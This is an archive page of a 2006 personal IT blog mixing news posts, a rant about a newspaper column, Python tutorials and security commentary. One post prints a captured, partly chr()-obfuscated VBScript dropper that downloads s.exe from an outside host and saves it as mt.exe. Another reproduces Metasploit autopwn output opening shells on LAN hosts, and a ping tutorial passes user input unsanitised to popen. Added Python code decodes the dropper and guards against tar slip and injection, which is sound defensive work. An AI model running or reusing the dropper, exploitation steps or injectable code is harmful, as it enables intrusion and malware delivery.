Archive

Archive for September, 2006

New Vista Available for General Download

Microsoft has made Vista RC1 Update (Build 5728) available online, apparently for a limited time only. Anyone wishing to download it can grab it from here.

I know previously it was only installable on Virtual PC and that VMWare gave a lot of headaches.... I'm going to try it on VMWare when I finish the download and I'll post a write-up on how it went and if it was possible what settings I used.

Peace,
HT

Categories: IT Tags:

Sometimes even I’m ashamed to be Canadian…

For those that know me personally, I'm a strong nationalist... I'm proud of my country and its accomplishments, even if I was born before many of them took place....

However, when I came home from work today I sat down and read the paper... I was shocked... horrified... and almost suicidal after reading an article... It was so depressing... a "Reporter".... perhaps "Fairy Tale Author" would be a better term since she put The Brothers Grimm and Mother Goose to shame ... had the gall to not report but give commentary... Now commentary is generally good... The commentators are humourous or serious and to the point... but not this "Fairy Tale Author".... I'm guessing it was about an hour before her deadline and she still had nothing so she chose to rant (much like I'm doing now). The difference was that she went to Google and typed in a search along the lines of "longest words in the English language"... she has some great flowery statements in there... it could be poetry if she wasn't trying so hard to make it a newspaper article...

To sum the article up -- "So many words, so little said"

Here are a few examples for those of you not brave enough to visit the actual article:

There is nothing quixotic, tipping at windmills dreamy, about the security and stabilization mission to Afghanistan.

They don't fight like them, they aren't drawn from a broad arc of ethnic groups and tribal alliances like them, and they're not nationally, passionately, esteemed as valiant warriors like them.

Or further, even more ignobly, that this struggle is not in our interest — not worth the blood of Canadian men and women — and that we should disengage forthwith, concentrate our resources, in treasure and troops, elsewhere. (But elsewhere, be it Darfur or Haiti — or whatever bright object of humanitarian need might captivate the likes of Jack Layton — would lose its thrall, you can bet on it, as soon as Canadian troops started dying there, too.)

But we're making a grandiose and mythical enemy out of the Taliban, as if this faction is an opponent that can't be dislodged or even contained, prevented from sloshing over into all the other provinces where there has been no robust threat to the rehabilitation of Afghanistan.

This is dangerous defeatism and a self-fulfilling prophecy for the constituency that is isolationist at heart or reflexively opposed to any military intervention anywhere. They cloak their objections in the purported futility of Afghanistan — a morass in the making,

We are flirting with failure, not because that fate is foretold but because, five years (Long live the F)

Peace,
HT

PS: This blog will remain as IT Related as I can make it.... but this just had to be voiced.... and between this site and SpamMailBag, I've broken 10,000 visitors this month.... that seemed like a nice number of people to try and reach with this message... And thank you to my visitors.

Categories: Personal Tags:

Hackers in the House

A rather interesting link was sent out a couple of days ago to the SecurityBasics mailing list.. It documents the actions taken by a "hacker" after they have gained access to an insecure Windows box.... While details of the exploit used and the system setup are not revealed, it is still interesting to read through and see the actions that are performed... Snort data and packet captures are included, however they've been heavily sanitized.

I would have to say that step 14 was by far the best, as it includes some scripting that was written to a file.. When cleaned up the code looks a little more like this:

execute(chr(8x)^&^chr(101)^&^chr(116)^&^chr(x2)^&^chr(120)^&^chr(80)^&^chr(111)^&^chr(115)^&^chr(116)^&^chr(x2)&^chr(61)^
&^chr(x2)^&^chr(67)^&^chr(11x)^&^chr(101)^&^chr(97)^&^chr(116)^&^chr(101)^&^chr(79)^&^chr(98)^&^chr(10)^&^chr(101)^&^
chr(99)^&^chr(116)^&^chr(x0)^&^chr(xx)^&^chr(77)^&^chr(105)^&^chr(99)^&^chr(11x)^&^chr(111)^&^chr115)^&^chr(111)^&
^chr(102)^&^chr(116)^&^chr(x6)^&^chr(88)^&^chr(77)^&^chr(76)^&^chr(72)^&^chr(8x)^&^chr(8x)^&^ch(80)^&^chr(xx)^&^chr(x1)
^&^chr(58)^&^chr(10))
xPost.Open ^"GET^",^"http://ZXMM.KMIP.NET:81/s.exe^",0
xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^")
sGet.Mode =x
sGet.Type = 1:sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile ^"mt.exe^",2
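What a defender can do with a captured script like this is decode it for triage rather than read chr() chains by hand. The following Python 3 example is added here and is not part of the linked write-up or the original post: it strips the cmd.exe caret escapes, expands chr() chains into the strings they build, and flags the download-and-save indicators; uncaret, decode_chr_chains and triage are names chosen for this example, and SAMPLE is a constructed script in the same shape, not the captured one.

```python
import re

# cmd.exe escapes &, |, <, >, " and ^ with a caret when a script is echoed
# into a file, which is why captured text of this kind is littered with '^'
_CARET = re.compile(r"\^(.)")
# a run of chr(N) calls joined by &: the VBScript trick for hiding ProgIDs
# and URLs from naive string matching
_CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*&\s*chr\(\s*\d+\s*\))*", re.I)
_CHR_ONE = re.compile(r"chr\(\s*(\d+)\s*\)", re.I)

# strings typical of the download-and-save pattern in the captured script
INDICATORS = ("xmlhttp", "adodb.stream", ".responsebody", "savetofile", ".exe")


def uncaret(text):
    """Undo cmd.exe caret escaping: ^& -> &, ^" -> ", ^^ -> ^ and so on."""
    return _CARET.sub(r"\1", text)


def decode_chr_chains(text):
    """Replace each chr(N)&chr(N)... chain with the quoted string it builds."""
    def build(match):
        codes = _CHR_ONE.findall(match.group(0))
        return '"' + "".join(chr(int(n)) for n in codes) + '"'
    return _CHR_CHAIN.sub(build, text)


def triage(script_text):
    """Return (decoded_text, indicators_found) for a captured script.

    Indicators are matched against the decoded text, so hiding them inside
    chr() chains or behind carets does not let the script slip past the check.
    """
    decoded = decode_chr_chains(uncaret(script_text))
    lowered = decoded.lower()
    return decoded, [i for i in INDICATORS if i in lowered]


def _chr_encode(s):
    """Build a caret-escaped chr() chain; used only to construct the sample."""
    return "^&^".join("chr(%d)" % ord(c) for c in s)


# Constructed sample in the same shape as the captured script (not the real
# one): the object creation is hidden in a chr() chain, the rest is caret-escaped.
SAMPLE = (
    "execute(" + _chr_encode('Set xPost = CreateObject("MSXML2.XMLHTTP")') + ")\n"
    'xPost.Open ^"GET^",^"http://example.invalid/s.exe^",0\n'
    'xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^")\n'
    "sGet.Write(xPost.responseBody)\n"
    'sGet.SaveToFile ^"mt.exe^",2\n'
)

if __name__ == "__main__":
    text, hits = triage(SAMPLE)
    print(text)
    print("indicators:", hits)
```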

Anyways.... it won't take overly long to read and it was definitely worth the read.

Peace,
HT

Categories: IT, Security Tags:

Unofficial Patch Released for Latest IE 0Day

So the guys over at ZERT have released what I believe is their first patch since forming. The group... the Zeroday Emergency Response Team... has put out a patch for the IE VML 0Day (MS Advisory | Press | Source Code) that has been circulating. If you are interested in it you can download it from their website.

This has me thinking a lot about patch management and I'm going to put some thought into it tomorrow and publish it tomorrow night or Sunday morning.

Peace,
HT

Categories: IT, Security Tags:

Python Modules – Tar, Sys & String — Python Tutorial

Yet another repost... I have nothing new to post at the moment... but all in due time.

Original (Remember even this one is over two years old... the others are three years.... I was still learning when I wrote these... but they're good for introducing the basics)
********************
Step-by-Step Process
********************
1. Open your favourite editor (Vi, Pico, Notepad, Wordpad, Textpad, DOS Edit).
2. Type (indentation lost -- email me if you need help)

code:

""" Python Script to Deal with Tarballs Flags: c(ompress), d(compress), g(zip) """ import tarfile import string import sys try : strFlags = sys.argv[1] except : strFlags = "-h" decompress = "yes" compress = "yes" gzip = "yes" if string.find(strFlags, "-") == 0 : if string.find(strFlags, "h") != -1 : print "Usage: %s - " % sys.argv[0] print "Flags: d[ecompress]n c[ompress]n g[zip]" sys.exit(0) try : strArchive = sys.argv[2] except : print "Error Argument Missing" sys.exit(0) if string.find(strFlags, "d") == -1 : decompress = "no" if string.find(strFlags, "c") == -1 : compress = "no" if string.find(strFlags, "g") == -1 : gzip = "no" if compress == "yes" and decompress == "yes" : print "ERROR - CANNOT DECOMPRESS AND COMPRESS" sys.exit(0) elif compress == "yes" and gzip == "no" : try : strFile = sys.argv[3] except : print "Error Argument Missing" sys.exit(0) tarball = tarfile.open(strArchive, "w") tarball.add(strFile) tarball.close() elif compress == "yes" and gzip == "yes" : try : strFile = sys.argv[3] except : print "Error Argument Missing" sys.exit(0) tarball = tarfile.open(strArchive, "w:gz") tarball.add(strFile) tarball.close() elif decompress == "yes" and gzip == "no" : try: tarball = tarfile.open(strArchive, "r") except : print "ERROR - FILE MISSING" sys.exit(0) for tarfile.tarinfo in tarball : tarball.extract(tarfile.tarinfo) tarball.close() elif decompress == "yes" and gzip == "yes" : try : tarball = tarfile.open(strArchive, "r:gz") except : print "Error - File Missing" sys.exit(0) for tarfile.tarinfo in tarball : tarball.extract(tarfile.tarinfo) tarball.close() else : print "ERROR NO FLAGS GIVEN" sys.exit(0)

3. Save the script as tar.py
4. Open a command prompt and type python tar.py -h
5. Now for the walk through.

We start off with a comment which is signified by 3 quotation marks

code:

"""


This is also how a comment is ended.
Following this we import the 3 modules we are going to use (tarfile, sys and string). We do so using the import statement. In previous tutorials we used the from module import * form. This was done so that we wouldn't have to reference the module. However, I now feel that you can keep up and reference the correct module; this is a more proper way of programming.

I have used a fair amount of error checking in this, so I will cover all those lines right now. While the error checking and the code are by no means complete, I decided to cover some of it. I mentioned error checking in Introduction to Python #3 if you need to go back and look at it. Basically what it does is try to execute the code following try : and if it is successful it carries on with the rest of the program; however, if the code fails (if the argument isn't present, for example) then it runs the except : code, which prints an error and then uses sys.exit(0) to tell the program to exit cleanly.

Next I set a few variables equal to yes. I suppose I could have used 1/0, but yes/no was simpler for what I wanted. Basically these three variables will store the values of our flags (on or off).

Now we'll check to see if we have a - to signify our flags. The code is slightly redundant here: it has already checked for the presence of the argument and, if it didn't exist, set it to -h (the first try and except). This is just making sure the - exists, to be picky; if it doesn't, the program will exit.
Next we check whether the flag is set to -h (help). As you can see, the help text makes use of %s to allow us to include the value of a variable in our string, as well as \n which represents a new line (for more info on either of these see Introduction to Python #2 and Introduction to Python #3).
The string.find(strFlags, "-") command simply checks where the hyphen exists in the strFlags variable. If the - didn't exist, -1 would be returned; since it is in the first position, the index 0 is returned.
Next comes a collection of if statements (I explored if statements in the original Python Introduction).

We are now into our tarfile module code. This is what we really want to explore. I have used three options since they will be the most recognized: tar, untar, and gzip. The first thing we do every time is open the file we want to work with (this could be a new file or an already existing one). We open a file by creating a variable to "store the file" (sorry, I'm a networking guy, not a programmer.. I'm not up on all the lingo). We use tarfile.open to reference the file.. The first value passed to tarfile.open is the name of the archive we wish to open/create (in this case stored as strArchive). The second value is the mode (r[ead] or w[rite]). If we are dealing with gzip compression we add :gz to tell the module about the compression.
If we are compressing the file, it is rather simple: we just access the file by referencing its variable (tarball) and use the add function, which we pass the name of the file we are compressing. We then close our file stream (Hey I remember the word.. I think.. but I'm not changing it in case I'm wrong) by referencing the variable/stream (tarball) with the .close function.
If we are decompressing the file, we must extract once for each file in the tar. We use a for statement (addressed in a previous tutorial, I believe); if not, it simply says for each member in this archive. Iterating over the open archive gives us a TarInfo object for each file it contains, which stores the name of that file. We then pass that object to the extract function on the file stream to extract it.
We then close the file stream in the same way we did while compressing a file.
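The decompress loop extracts every member under whatever name the archive supplies, so an archive containing ../ paths or links that point outside the target directory can write outside it (the "tar slip" problem). The following Python 3 example is added here and is not part of the original tutorial: it vets each member before extraction and runs against a constructed archive; is_within, classify_members, safe_extract and build_sample_tar are names chosen for this example.

```python
import io
import os
import tarfile
import tempfile


def is_within(base, relpath):
    """True when base/relpath, after normalisation, still lies inside base."""
    base = os.path.abspath(base)
    target = os.path.abspath(os.path.join(base, relpath))
    return os.path.commonpath([base, target]) == base


def classify_members(tar, dest):
    """Return (safe, rejected) member names for extracting `tar` into `dest`.

    A member is rejected when its name is absolute or escapes dest through
    '..', or when it is a link whose target would resolve outside dest.
    """
    safe, rejected = [], []
    for member in tar:
        name = member.name
        if os.path.isabs(name) or not is_within(dest, name):
            rejected.append(name)
            continue
        if member.issym() or member.islnk():
            # symlink targets are relative to the member's own directory,
            # hard-link targets are relative to the archive root
            link_base = os.path.dirname(name) if member.issym() else ""
            target = os.path.join(link_base, member.linkname)
            if os.path.isabs(member.linkname) or not is_within(dest, target):
                rejected.append(name)
                continue
        safe.append(name)
    return safe, rejected


def safe_extract(tar_bytes, dest):
    """Extract only vetted members of a gzip'd tarball; return (extracted, rejected)."""
    extracted = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        safe, rejected = classify_members(tar, dest)
        for member in tar.getmembers():
            if member.name in safe:
                tar.extract(member, dest)
                extracted.append(member.name)
    return extracted, rejected


def build_sample_tar():
    """Constructed test archive: a benign file, a '..' traversal member and a
    symlink pointing outside the destination (the classic tar-slip shapes)."""
    buf = io.BytesIO()
    payload = b"hello\n"
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name in ("good.txt", "../evil.txt"):
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
        link = tarfile.TarInfo("escape")
        link.type = tarfile.SYMTYPE
        link.linkname = "../../etc/passwd"
        tar.addfile(link)
    return buf.getvalue()


def demo():
    """Run the sample through safe_extract in a scratch directory and report
    what was extracted, what was rejected, and what actually landed on disk."""
    scratch = tempfile.mkdtemp()
    dest = os.path.join(scratch, "out")
    os.makedirs(dest)
    extracted, rejected = safe_extract(build_sample_tar(), dest)
    return extracted, rejected, sorted(os.listdir(dest)), sorted(os.listdir(scratch))


if __name__ == "__main__":
    print(demo())
```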

The only thing I didn't touch on was arguments. For you C/C++ programmers, this should seem fairly familiar (at least based on my basic knowledge of those languages). sys.argv is an array that stores all the arguments. The first argument would be sys.argv[0], which would be the name of the script being executed; sys.argv[1] would be the name of the first argument following the script name. There is however no sys.argc function; to get the equivalent of argc in C/C++ you would have to use len(sys.argv).

Peace,
HT

Categories: IT, Python, Tutorials Tags:

Simplistic SMTP “HoneyPot” – Python Tutorial

Here's another tutorial repost

Original
***********************
Step-by-Step Process
***********************
1. Open your favourite editor (Vi, Pico, Notepad, Wordpad, Textpad, DOS Edit).
2. Type

code:

# Demonstrates various methods of importing modules.
from socket import *
import string
import time
# create a socket of the basic type.
s = socket(AF_INET, SOCK_STREAM)
# define our banner (SMTP replies end with CRLF, so "\r\n" goes after the time)
senddata1 = "220 desktop Microsoft ESMTP MAIL Service, Version 6.0.2600.1106 ready at " + time.strftime("%a, %d %b %Y %H:%M:%S %Z") + "\r\n"
# Query the user for their IP Address and set that and the port
HOST = raw_input("Enter IP Address to bind socket to: ")
PORT = 25
# Bind the socket to an IP Address and Port
s.bind((HOST, PORT))
# Have the socket listen for a connection
s.listen(1)
# Accept an incoming connection
(incomingsocket, address) = s.accept()
# Send our banner
incomingsocket.send(senddata1)
# Convert incoming address to a string
straddress = str(address)
# Split the tuple into lists
testlist = string.split(straddress, ",")
# Split the host portion of the list
gethost = string.split(testlist[0], "'")
# Split the port portion of the list
getaddr = string.split(testlist[1], ")")
# Remove just the address from the list
host = gethost[1]
# Remove just the port from the list
incomingport = int(getaddr[0])
# (address is already a (host, port) tuple, so "host, incomingport = address"
#  does the same thing; the splitting above is the long way, to show string.split)
# define our Warning
senddata2 = "Illegal Access of this server, your IP [" + host + "] has been logged.\r\n"
# Print connection information to the stdout
print "Connection attempt on port", PORT, "from", host, ":", incomingport
# Listen for incoming data
data = incomingsocket.recv(1024)
# Send the Warning
incomingsocket.send(senddata2)
# Close the connection and then the listening socket
incomingsocket.close()
s.close()

3. Save the script as honeypot.py
4. Open the command prompt and type python honeypot.py (If you get an error, you may already have port 25 in use, simply edit the file to change the port number.)
5. You will be prompted with Enter IP Address to bind socket to: Enter the IP address you wish to have the honey pot listen on. This could be 127.0.0.1 if you simply wish to test it, or your outgoing IP if you wish to actually listen for connection attempts. You will now notice nothing, however you can telnet or nc to the IP you entered on port 25. Your connection will display the defined banner 220 desktop Microsoft ESMTP MAIL Service, Version 6.0.2600.1106 ready at followed by the current time (the %

This is only a single connect server and very basic, no complex commands. As time goes on I will post another tutorial on this same honey pot, only expanded to actually convince the user they are connected to the mail server.

The new commands in this tutorial include various socket commands, the time.strftime command and a few string commands.

time.strftime("format") - This command returns a string containing the time and date in the specified format.
str(non-string) - Converts a non-string to a string (there are also int() and tuple() commands).
string.split(string, delimiter) - Splits a string into a list at every delimiter. The list is then referenced by listname[list object number] (numbering begins at 0).

This script contains similar starting socket commands to my first Python Tutorial, however it includes a few extras. After accepting the connection, this script sends the banner using the incomingsocket.send command. This takes the variable we defined on the s.accept (socket accept command) and tells the computer to send data back to it. It then listens for data (incomingsocket.recv) with a maximum buffer size of 1024. Upon receiving this data it again transmits data to the connecting PC and closes the connection with incomingsocket.close.
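The promised expansion, a listener that speaks enough SMTP to keep a client talking while recording what it sends, can be built as a small state machine that is testable without a socket. The following Python 3 example is added here and is not part of the original tutorial: SmtpHoneypotSession handles one connection's commands and HoneypotHandler wires it to socketserver; the reply strings are constructed to look like a Windows SMTP service and nothing sent to it is ever delivered. The class and function names are chosen for this example.

```python
import socketserver
import time

BANNER = "220 desktop Microsoft ESMTP MAIL Service, Version: 6.0.2600.1106 ready at %s"


class SmtpHoneypotSession:
    """Minimal SMTP state machine for one connection.

    Every line the client sends is recorded; the message body is captured but
    never relayed or stored as mail, so the honeypot cannot be used to send.
    """

    def __init__(self, peer):
        self.peer = peer          # (host, port) of the connecting client
        self.log = []             # raw lines received, in order
        self.mail_from = None
        self.rcpt_to = []
        self.body = []
        self.in_data = False
        self.closed = False

    def banner(self):
        return BANNER % time.strftime("%a, %d %b %Y %H:%M:%S %z")

    def feed(self, line):
        """Handle one client line (without CRLF); return the reply or None."""
        self.log.append(line)
        if self.in_data:
            if line == ".":
                self.in_data = False
                return "250 2.6.0 Queued mail for delivery"   # it is not
            # RFC 5321 dot-stuffing: a leading ".." means a literal "."
            self.body.append(line[1:] if line.startswith("..") else line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return "250 desktop Hello [%s]" % self.peer[0]
        if verb == "MAIL":
            self.mail_from = arg.partition(":")[2].strip()
            return "250 2.1.0 Sender OK"
        if verb == "RCPT":
            self.rcpt_to.append(arg.partition(":")[2].strip())
            return "250 2.1.5 Recipient OK"
        if verb == "DATA":
            if not self.rcpt_to:
                return "503 5.5.2 Need rcpt command"
            self.in_data = True
            return "354 Start mail input; end with <CRLF>.<CRLF>"
        if verb == "QUIT":
            self.closed = True
            return "221 2.0.0 Service closing transmission channel"
        return "500 5.3.3 Unrecognized command"

    def summary(self):
        """What gets logged once the client disconnects."""
        return {"peer": self.peer, "from": self.mail_from,
                "to": list(self.rcpt_to), "lines": len(self.log)}


class HoneypotHandler(socketserver.StreamRequestHandler):
    def handle(self):
        session = SmtpHoneypotSession(self.client_address)
        self.wfile.write((session.banner() + "\r\n").encode())
        while not session.closed:
            raw = self.rfile.readline(1024)
            if not raw:
                break
            reply = session.feed(raw.decode("latin-1").rstrip("\r\n"))
            if reply is not None:
                self.wfile.write((reply + "\r\n").encode())
        print(time.strftime("%Y-%m-%d %H:%M:%S"), session.summary())


if __name__ == "__main__":
    # bind to an unprivileged port for testing; use 25 for real listening
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    with socketserver.ThreadingTCPServer(("127.0.0.1", 2525), HoneypotHandler) as srv:
        srv.serve_forever()
```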


Source: http://www.python.org/doc/lib/module-time.html
time.strftime format flags

%a Locale's abbreviated weekday name.
%A Locale's full weekday name.
%b Locale's abbreviated month name.
%B Locale's full month name.
%c Locale's appropriate date and time representation.
%d Day of the month as a decimal number [01,31].
%H Hour (24-hour clock) as a decimal number [00,23].
%I Hour (12-hour clock) as a decimal number [01,12].
%j Day of the year as a decimal number [001,366].
%m Month as a decimal number [01,12].
%M Minute as a decimal number [00,59].
%p Locale's equivalent of either AM or PM.
%S Second as a decimal number [00,61].
%U Week number of the year (Sunday as the first day of the week) as a decimal number [00,53]. All days in a new year preceding the first Sunday are considered to be in week 0.
%w Weekday as a decimal number [0(Sunday),6].
%W Week number of the year (Monday as the first day of the week) as a decimal number [00,53]. All days in a new year preceding the first Monday are considered to be in week 0.
%x Locale's appropriate date representation.
%X Locale's appropriate time representation.
%y Year without century as a decimal number [00,99].
%Y Year with century as a decimal number.
%Z Time zone name (no characters if no time zone exists).
%% A literal "%" character.

Peace,
HT

Categories: IT, Python, Tutorials Tags:

Python 2.5 Released

This is just a short post... Python 2.5 has been released... There are a few syntax changes that look like they're for the better... I'm interested to sit and play with it later.

From the release notes:

Python Introduction — Part 3

The third installment -- originally posted here.

Before I jump into those there is another chart I would like to add. In my last tutorial I mentioned a new way to use the print command, to make it a little more C/C++ like. However I didn't realize that some users may not have C/C++ experience and not know about the % options. So here is a chart with all of your options.

quote:
Source: Python 101 - Beginning Python

d Signed integer decimal.
i Signed integer decimal.
o Unsigned octal.
u Unsigned decimal.
x Unsigned hexadecimal (lowercase).
X Unsigned hexadecimal (uppercase).
e Floating point exponential format (lowercase).
E Floating point exponential format (uppercase).
f Floating point decimal format.
F Floating point decimal format.
g Same as "e" if exponent is greater than -4 or less than precision, "f" otherwise.
G Same as "E" if exponent is greater than -4 or less than precision, "F" otherwise.
c Single character (accepts integer or single character string).
r String (converts any python object using repr()).
s String (converts any python object using str()).
% No argument is converted, results in a "%" character in the result.

Now on to our new lesson.

I would like to look at executing files located on your system. As I mentioned in the first tutorial, I would like to keep this OS independent, so we will deal with the ping command as it is universal. I will be using the count flag, and I will use the Windows flag, which is -n, so *nix users must remember to change it to -c or they will get an error.

********************
Step-by-Step Process
********************
1. Open your favourite editor (Vi, Pico, Notepad, Wordpad, Textpad, DOS Edit).
2. Type

code:

from os import *

count = input("Number of times to ping host: ")
host = raw_input("IP of host to ping: ")
pingcmd = "ping -n %i %s" % (count, host)
execute = popen(pingcmd)
results = execute.readlines()
execute.close()
length = len(results)
for x in range (length) :
    print results[x]


3. Save the script as pingtest.py
4. Open a command prompt and type python pingtest.py
5. This one is a little more difficult to walk you through. First you will see Number of times to ping host: . Enter a number and press enter. Then you will see IP of host to ping: . Enter an IP and again press enter. There will be a pause (the length of which will depend on how many times you told it to ping). Then you will see the standard output of a ping command written to the screen.

Now to walk you through this script. We import the os module and then query the user for the number of pings and the host to ping. Then we define our ping command using the same format as the print command. The next line actually executes the command, followed by a line which reads the output of the command into a variable. We then close the variable which executed the command. The next line introduces another new command, the len command, which returns the length. In this case, since results is an array, it returns the number of lines in the array. We then make use of the for command we learned in our last tutorial and have it print the actual content of the array, line by line. Notice the use of the whitespace again for the for command.
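The script builds its command line from user input and hands it to popen, which runs it through the shell, so a host value containing shell metacharacters would be interpreted as further commands (and Python 2's input() evaluates whatever the user types for the count). The following Python 3 example is added here and is not part of the tutorial: it validates the host, parses the count with int(), and passes the arguments to subprocess as a list so nothing is shell-interpreted; validate_host, build_ping_argv and run_ping are names chosen for this example.

```python
import ipaddress
import re
import subprocess
import sys

# one DNS label: letters, digits and hyphens, no leading or trailing hyphen
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def validate_host(host):
    """Return True only for a literal IP address or a well-formed hostname.

    Anything else (spaces, ';', '&', '|', quotes, ...) is rejected, so the
    value can never carry shell syntax even if it later reaches a shell.
    """
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    if not host or len(host) > 253:
        return False
    return all(_LABEL.match(label) for label in host.rstrip(".").split("."))


def build_ping_argv(count, host, platform=sys.platform):
    """Build the ping command as an argument list: -n on Windows, -c elsewhere.

    count must be a positive int (parse it with int(), never input()/eval)
    and host must pass validate_host; otherwise ValueError is raised.
    """
    if not isinstance(count, int) or count < 1:
        raise ValueError("count must be a positive integer")
    if not validate_host(host):
        raise ValueError("invalid host: %r" % host)
    flag = "-n" if platform.startswith("win") else "-c"
    return ["ping", flag, str(count), host]


def run_ping(count, host):
    """Execute ping without a shell and return its output lines."""
    argv = build_ping_argv(count, host)
    # shell=False (the default): argv goes straight to the OS, so no
    # metacharacters are ever interpreted, unlike popen("ping -n %i %s" % ...)
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout.splitlines()


if __name__ == "__main__":
    n = int(input("Number of times to ping host: "))
    h = input("IP of host to ping: ")
    for line in run_ping(n, h):
        print(line)
```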

Alrighty.... moving on, I believe I promised you file reading/writing next. We'll work with a simple txt file.

********************
Step-by-Step Process
********************
1. Open your favourite editor (Vi, Pico, Notepad, Wordpad, Textpad, DOS Edit).
2. Type

code:

print "File Write/Create Example." filename = raw_input("File to Write To/Create: ") openfile = file(filename, 'w') print "Enter text to write to file (Type 'quit' to quit):" line = "" alllines = "" while 1 : line = raw_input() if line == 'quit' : break alllines = alllines + line + "n" file.write(openfile, alllines) file.close(openfile) print "You just wrote to a file, Now Let's see what you wrote." print "File Read Example." openfile = file(filename, 'r') filedata = openfile.readlines() length = len(filedata) for x in range(length) : print filedata[x] openfile.close


3. Save the script as filetest.py
4. Open a command prompt and type python filetest.py
5. When you run this program you will be prompted to enter a filename. Call the file anything you want. The next line of code then opens that file in write ('w') mode (it will create it if it doesn't exist). The code then tells you to type your text, and declares two blank variables. The while 1 : is just a way of creating an infinite loop, so that every time the user hits enter, it moves to a new line of the file. The line is used to receive input, but we aren't prompting the user each time. The if statement introduces another new command, break. This will exit the loop upon seeing the string 'quit'. The next line of code simply concatenates the previous lines with the new line and then adds a newline character. After the user has entered quit we write to the file and close the file. You then see a few lines of text. The script then opens the file in read ('r') mode. We read the lines into an array and determine the number of lines like we did in our ping tutorial. We then enter a for statement and print each line until we get to the end of the file. Then we close the file.

The last thing I promised for this tutorial was error handling. This is useful for small things like if you've forgotten to declare a variable and other such events. I can't think of a useful example at the moment, so I'll just go over the commands and if I think of some code later I'll add it.

Basically the commands are try and except.

Instead of just issuing the code, you try it. For example if you were attempting to read a file that didn't exist. The program would exit and return an error. However if you try and have an except...

code:

try :
    openfile = file(filename, 'r')
except :
    # a bare except catches every error; catching IOError alone is tidier
    print "File doesn't exist."

Now if the file doesn't exist it will simply print File doesn't exist. and continue on with the program.

Peace,
HT

Categories: IT, Python, Tutorials Tags:

Metasploit 3.0 Automated Exploitation

H.D. Moore has released a great article on performing automated exploitation using Metasploit 3.0. To obtain the latest MSF 3.0 source code you require svn... To perform the actual exploitation you'll require Ruby, PostgreSQL and RubyGems. The article provides a great explanation of setting everything up and running the automated exploitation.. There's also console output to show you exactly what you type and what happens.. It's definitely worth the read and once I play with it a bit, I'll be throwing my comments and results up here for everyone to read.

Peace,
HT

-----

Console Output:

-----

$ ./msfconsole

=[ msf v3.0-beta-2-svn
+ -- --=[ 102 exploits - 93 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 13 aux

msf > load db_postgres
[*] Successfully loaded plugin: db_postgres

msf > db_create
dropdb: database removal failed: ERROR: database "metasploit3" does not exist
CREATE DATABASE
ERROR: table "hosts" does not exist
[ snip ]

msf > db_nmap -p 445 192.168.0.0/24

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-09-17 22:49 CDT

Interesting ports on destructo (192.168.0.2):
PORT STATE SERVICE
445/tcp open microsoft-ds

Interesting ports on WIN2000DB.lan (192.168.0.106):
PORT STATE SERVICE
445/tcp open microsoft-ds

Interesting ports on WINXPSP0.lan (192.168.0.108):
PORT STATE SERVICE
445/tcp open microsoft-ds

Interesting ports on WIN2000SP4.lan (192.168.0.139):
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap finished: 256 IP addresses (8 hosts up) scanned in 12.493 seconds
msf > db_services
[*] Service: host=192.168.0.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.106 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.108 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.139 port=445 proto=tcp state=up name=microsoft-ds

msf > db_autopwn -p -t -e
[*] Analysis completed in 0.208992004394531 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.0.106:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.108:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.2:445...
[ snip ]
[*] Calling the vulnerable function...
[*] Calling the vulnerable function...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.0.139[\BROWSER] ...
[*] Building the stub data...
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 4 opened (192.168.0.145:60778 -> 192.168.0.139:26188)
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 5 opened (192.168.0.145:47380 -> 192.168.0.106:27700)

msf > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.145:46858 -> 192.168.0.139:15441
2 Command shell 192.168.0.145:42700 -> 192.168.0.108:28199
3 Command shell 192.168.0.145:40966 -> 192.168.0.106:27915
4 Command shell 192.168.0.145:60778 -> 192.168.0.139:26188
5 Command shell 192.168.0.145:47380 -> 192.168.0.106:27700

msf > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Categories: IT, Security Tags:

Site Related Google Groups

So I've decided to add some GoogleGroups related to CDO and SpamMailBag... I'm not sure they'll get used but now at least they exist if anyone is interested in them.

The CDO Group can be used for anything.... Feel free to sign up.. if it gets some members I may actually do something with it.

The SpamMailBag.com group is primarily to target mail harvesters and see what happens....

Feel free to check them out and join them.

Peace,
HT

Categories: Site Related, SpamMailBag.com Tags: